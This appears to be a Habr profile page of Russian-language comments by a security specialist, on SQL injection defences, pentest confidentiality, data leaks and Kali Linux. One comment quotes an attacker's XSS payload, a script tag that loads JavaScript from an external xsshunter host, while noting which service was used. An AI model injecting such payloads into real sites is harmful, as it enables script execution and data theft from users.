All streams
Search
Write a publication
Pull to refresh
261
0
Лука Сафонов @LukaSafonov

Information Security Evangelist

Send message
На уровне базы данных могут не поддерживаются привязанные переменные, поэтому необходимо использовать другие варианты.

Вот примеры с PHP: www.php.net/manual/ru/security.database.sql-injection.php
способов предотвращения SQL-инъекций два:
• не использовать динамические запросы к базе;
• не использовать пользовательские данные.

Учите матчасть:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense

cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

NOP служат для «обхода» антивирусных средств, но это уже устаревшая техника.
Зачем тогда разворачивать собственный сервис для этой задачи, спросите вы.

0. Чтобы не нарушать NDA и не кидать данные по пентесту направо налево.
Остановил чтение здесь:

image
При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>
Ссылка в посте есть, информация многим может быть полезна, чего-то еще высасывать из пальца нет смысла. Можно было бы обойтись двумя строками текста, но хабр не твиттер.
Для версий Mac Book Pro без тачбара с двумя портами слева — зарядку необходимо использовать в верхнем порту.
а мужики-то не знают.
Такую «базу» можно и нагенерить, она содержит записи типа ХХ ХХ ХХХХХХ. В подарок купившему дают базу ALL CREDIT CARD PIN CODES IN THE WORLD LEAKED.

Ага, дело не монге, но пароли в «вашей» бд вы храните (хранили в 2019) plaintext’ом. Теперь поинт вызвал доверие?

Немудрено, учитывая их «отношение» к багхантерам. О багах, приводящих к утечке пользователей в прошлом году сообщили минимум три человека, полученные ответы: дубль, это не продуктовая база и в таком духе. Вот и результат (=.
Сергей, с последней версией 4.1 он стал Web Security Testing Guide.
DE — desktop environment. Ошибки поправил. К сожалению переводить/дополнять особо нечем, такими темпами Kali скоро будут раздавать в виде дефолтового Debian/Ubuntu с набором обоев с драконами.
Сейчас точно 2019 год?
Распедалил по-взрослому. Респект, Сергей!

Information

Rating
Does not participate
Location
Москва, Москва и Московская обл., Россия
Works in
Date of birth
Registered
Activity

Specialization

Chief Technology Officer (CTO), Chief Product Officer (CPO)
Information Security